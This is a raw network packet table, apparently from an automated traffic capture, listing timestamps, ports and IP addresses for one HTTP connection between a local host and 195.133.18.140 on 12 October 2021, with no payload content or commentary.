Oct 12, 2021 12:35:34.602824926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602827072 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602850914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602860928 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602874994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602897882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602905989 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602917910 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602936029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602946997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.602960110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602982998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.602997065 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603007078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603022099 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603030920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603054047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603068113 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603079081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603101015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603166103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603183985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603189945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603208065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603225946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603228092 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603245020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603256941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603265047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603282928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603295088 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603300095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603317022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603332996 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603341103 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603348970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603357077 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603365898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603382111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603390932 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603401899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603418112 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603420019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603436947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603446960 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603452921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603468895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603482962 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603498936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603498936 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603555918 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603565931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603585958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603604078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603610992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603620052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603636980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603652000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603656054 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603667974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603683949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603698969 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603699923 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603718996 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603735924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603745937 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603751898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603769064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603784084 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603784084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603801012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603816986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603816986 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603835106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603846073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603854895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603872061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603873014 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603893042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603912115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603928089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603939056 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.603945971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603967905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603990078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.603990078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604012012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604031086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604039907 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604048014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604067087 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604084015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604099035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604114056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604115009 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604130030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604146004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604161024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604163885 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604177952 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604198933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604216099 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604223967 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604231119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604248047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604249001 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604264021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604279995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604295015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604299068 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604311943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604331017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604347944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604351997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604363918 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604379892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604381084 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604396105 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604410887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604412079 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604427099 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604439974 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604444027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604464054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604475021 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604480028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604496002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604511976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604520082 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604527950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604542971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604546070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604593039 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604604959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604626894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.604636908 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.604669094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.621535063 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.621926069 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630553961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630584955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630599976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630615950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630631924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630651951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630666018 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630669117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630682945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630700111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630716085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630734921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630744934 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630759001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630767107 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630774975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630790949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630806923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630815983 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630822897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630851030 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630883932 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.630934954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630953074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630968094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630980015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.630985975 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631016016 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631019115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631035089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631051064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631067991 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631067991 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631083965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631099939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631150007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631158113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631166935 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631189108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631210089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631211996 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631232023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631252050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631269932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631285906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631290913 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631290913 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631310940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631316900 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631330013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631337881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631347895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631362915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631370068 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631380081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631395102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631402969 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631411076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631426096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631442070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631460905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631477118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631491899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631506920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631515980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631522894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631525040 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631529093 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631540060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631556034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631565094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631571054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631589890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631597996 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631608009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631623030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631625891 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631639004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631649971 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631655931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631671906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631690979 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631695986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631712914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631726980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631746054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631747961 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631761074 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631764889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631781101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631797075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631798029 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631812096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631827116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631839991 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631849051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631865978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631876945 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631885052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631903887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631910086 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631921053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631936073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631952047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631956100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.631969929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631984949 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.631992102 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632002115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632020950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632020950 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632039070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632050991 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632055998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632071972 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632078886 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632087946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632102966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632110119 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632119894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632134914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632141113 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632154942 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632172108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632175922 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632198095 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632200003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632214069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632230043 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632245064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632251024 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632261038 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632276058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632285118 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632296085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632313013 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632316113 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632328987 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632338047 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.632344961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.632385969 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.647352934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.647485971 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.647511959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.647617102 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656603098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656650066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656677008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656681061 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656702042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656714916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656729937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656749964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656753063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656778097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656802893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656826973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656835079 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656848907 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656857014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656879902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656886101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656908035 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656913042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656938076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656946898 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656963110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.656975985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.656987906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657011986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657013893 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.657036066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657062054 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.657067060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657090902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.657094955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657119036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657140970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.657143116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657169104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.657252073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.657320976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658024073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658102036 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658124924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658158064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658184052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658205986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658216000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658233881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658257961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658277988 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658279896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658303022 CEST	49749	80	192.168.2.6	195.133.18.140
